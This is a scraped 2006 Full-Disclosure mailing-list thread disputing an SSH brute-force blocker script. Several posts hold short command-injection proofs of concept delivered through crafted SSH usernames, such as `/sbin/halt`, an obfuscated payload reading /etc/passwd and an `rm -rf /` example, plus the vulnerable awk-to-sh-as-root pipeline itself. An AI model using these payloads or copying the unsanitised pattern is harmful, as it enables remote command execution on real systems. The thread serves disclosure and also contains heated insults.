You have experience in disarming land mines with a hammer while you are
stark naked?
Now that¹s a real man¹s job!
On 11/27/06 4:20 PM, Brian Eaton [EMAIL PROTECTED] wrote:
On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote:
There is no hocus pocus here. Look at /var/log/secure and fine the
Salut,
On Fri, 2006-12-01 at 06:59 -0500, J. Oquendo wrote:
Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
awk '($5==Illegal||$6==Illegal)$9==from{print $10}'
What if I set my user name to bikermice from mars? Are you going to
blacklist mars then?
Apparently
Salut,
On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote:
So again... Some of you guys need to go back and read before you post
In this case, the NF wasn't in your original posting, so I could hardly
have seen it. Still, there are problems with it, but not security
wise...
awk
On Fri, 01 Dec 2006, J. Oquendo wrote:
Tonnerre Lombard wrote:
In this case, your awk statement checks that argument $6 is
Illegal (which it is) and argument $9 is from (which it is). So it
takes $10 and prints it (in this case, mars.)
If you check $10 to look like an IP address, I set
On Fri, 01 Dec 2006, Raphael Marichez wrote:
You mention (from the attached mail, you've written):
sorry, here's your email
--
Raphaël Marichez aka Falco
---BeginMessage---
Tavis Ormandy wrote:
On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote:
I notice you also havnt solved
Salut,
On Mon, 2006-11-27 at 16:21 -0500, gabriel rosenkoetter wrote:
Nope, I'm wrong, just the literal string `/sbin/halt`, which you
never exec.
Well, he does in the iptables command
Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit
Thierry Zoller wrote:
Dear All,
You are arguing over hypothesises where facts could rule. PLEASE someone
just setup the script on a test environment and present us your
results. Heck, it's not that we are discussing Metaproblems here,
these are computers.
Just install and make a PoC and
On Tue, Nov 28, 2006 at 09:33:03AM -0500, J. Oquendo wrote:
Thierry Zoller wrote:
Dear All,
You are arguing over hypothesises where facts could rule. PLEASE someone
just setup the script on a test environment and present us your
results. Heck, it's not that we are discussing Metaproblems
Tavis Ormandy wrote:
However, it is certainly possible. Here is an example.
#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd)'
ssh -o BatchMode yes a a $command@$1
Which produces log entries like this:
Nov 28 15:14:15 insomniac sshd[5897]:
On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote:
Incorrect did you look at the fix? It isn't unsanitized as you state:
J, you have made an attempt to fix it, but is is not sufficient.
An attacker can still add arbitrary hosts to the deny list.
Thanks, Tavis.
--
Tavis Ormandy wrote:
On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote:
Incorrect did you look at the fix? It isn't unsanitized as you state:
J, you have made an attempt to fix it, but is is not sufficient.
An attacker can still add arbitrary hosts to the deny list.
Thanks,
Dear Tavis,
TO J, you have made an attempt to fix it, but is is not sufficient.
TO An attacker can still add arbitrary hosts to the deny list.
Can you propose a fix ? Apart from the aggressivness of this thread
I find it interesting to read (from a tech standpoint).
--
On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote:
On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote:
Incorrect did you look at the fix? It isn't unsanitized as you state:
J, you have made an attempt to fix it, but is is not sufficient.
An attacker can still add
On Tue, Nov 28, 2006 at 05:14:28PM +0100, Thierry Zoller wrote:
Dear Tavis,
TO J, you have made an attempt to fix it, but is is not sufficient.
TO An attacker can still add arbitrary hosts to the deny list.
Can you propose a fix ? Apart from the aggressivness of this thread
I find it
Tavis Ormandy wrote:
On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote:
I notice you also havnt solved the local privilege escalation, this can
be abused by local users to gain root by attempting to login with the
username set to a valid passwd entry and then winning the race
On Tue, Nov 28, 2006 at 11:59:43AM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote:
I notice you also havnt solved the local privilege escalation, this can
be abused by local users to gain root by attempting to login with the
Just one possibly silly question.
Why are you working so hard to do this with complex scripts and stuff?
I just wrote a little C snippet that runs on the firewall.
All servers allowing external ssh send a copy of ssh auth to a port
on the firewall.
If it detects a brute force it adds the host
(Resending since this somehow didn't make it to the list the first
time. Apologies if you receive two copies.)
On 11/28/06, Thierry Zoller [EMAIL PROTECTED] wrote:
Dear Tavis,
TO J, you have made an attempt to fix it, but is is not sufficient.
TO An attacker can still add arbitrary hosts to
Anders B Jansson wrote:
Just one possibly silly question.
Why are you working so hard to do this with complex scripts and stuff?
I just wrote a little C snippet that runs on the firewall.
All servers allowing external ssh send a copy of ssh auth to a port
on the firewall.
If it detects a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Tue, 28 Nov 2006 10:59:43 -0600 J. Oquendo
[EMAIL PROTECTED] wrote:
Tavis Ormandy wrote:
On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote:
I notice you also havnt solved the local privilege escalation,
this can
be abused by local
On 11/28/06, Thierry Zoller [EMAIL PROTECTED] wrote:
TO J, you have made an attempt to fix it, but is is not sufficient.
TO An attacker can still add arbitrary hosts to the deny list.
Can you propose a fix ? Apart from the aggressivness of this thread
I find it interesting to read (from a tech
For those interested, I wrote a program called Sharpener which is an SSH
brute force blocking tool that also reports back the offenders'
addresses. I have begun posting the information on the attackers as well
as sending out messages (whenever possible) to the admins of these
domains. Think of
On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote:
For those interested, I wrote a program called Sharpener which is an SSH
brute force blocking tool that also reports back the offenders'
addresses. I have begun posting the information on the attackers as well
as sending out
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step by step. Here goes
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
Uh... actually, no. The provided exploit Will
Tavis Ormandy wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step
gabriel rosenkoetter wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
Uh...
gabriel rosenkoetter wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
Uh...
On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote:
There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with
On Mon, Nov 27, 2006 at 03:59:37PM -0500, gabriel rosenkoetter wrote:
Uh... actually, no. The provided exploit Will work, and you're the
idiot.
Begging your pardon, you are saved by single-quoting your awk(1)
statement:
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote:
So again dumbass...
Look at the script. Although YOU'RE opening /var/log/authlog what is the
script opening.
I'm opening authlog as I dont use secure, the same thing applies.
Please tell me you're really not that stupid. And if
Tavis Ormandy wrote:
I'm not sure what you mean by modification, I simply subsituted the name
for the logfile I use.
Thanks, Tavis.
So for the third time now. Explain to me how I am backdooring someone's
system.
[EMAIL PROTECTED] include]# uname -a
Linux int-mrkt 2.6.18-1.2200.fc5 #1
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.
Gabriel, I was
On Mon, Nov 27, 2006 at 09:29:33PM +, Tavis Ormandy wrote:
Gabriel, I was referring to this line:
awk '!/#/ /\./ !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/ !/#/ !/-s -i/'|sh
(note the |sh), $1 can
why not save all that trouble and just use the --limit directive in
iptables? (examples on the netfilter mailing-list).
~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
I'm not sure what you mean by modification, I simply subsituted the name
for the logfile I use.
Thanks, Tavis.
So for the third time now. Explain to me how I am backdooring someone's
system.
J,
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote:
So for the third time now. Explain to me how I am backdooring someone's
system.
[EMAIL PROTECTED] include]# uname -a
Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686
i686 i386 GNU/Linux
[EMAIL PROTECTED]
Tavis Ormandy wrote:
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
That specially crafted attempt would be a HUGE raping of TCP/IP. How do
you supposed it would be possible for someone to insert 0wn3ed or any
other variable outside of an IP address?
Remember the (in)famous quote ...that vulnerability is purely
theoretical...?
I think the point is you
gabriel rosenkoetter wrote:
You are dealing with output you can't trust there. $13 could be
anything, including \n`rm -rf /`. Later on, you pass $13,
unstripped of newlines, backticks, or any number of other special
character to a shell running as uid 0. That shell will proceed to
execute
gabriel rosenkoetter wrote:
On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote:
That specially crafted attempt would be a HUGE raping of TCP/IP. How do
you supposed it would be possible for someone to insert 0wn3ed or any
other variable outside of an IP address?
That's
Michael Holstein wrote:
That specially crafted attempt would be a HUGE raping of TCP/IP. How do
you supposed it would be possible for someone to insert 0wn3ed or any
other variable outside of an IP address?
Remember the (in)famous quote ...that vulnerability is purely
theoretical...?
On 27.Nov.2006 04:39PM -0500, Michael Holstein wrote:
why not save all that trouble and just use the --limit directive in
iptables? (examples on the netfilter mailing-list).
or use denyhosts (denyhosts.sf.net)
--josh
Joshua D. Abraham
Northeastern University
College of Computer and
On Mon, Nov 27, 2006 at 04:55:46PM -0500, J. Oquendo wrote:
No it can't. Even if it was rm -rf someone placed in, did you not notice
my grep statement? Only print items with a decimal. At no given point
anywhere on the 13th column whether its Solaris, NetBSD, FreeBSD, would
there be an
45 matches
Mail list logo
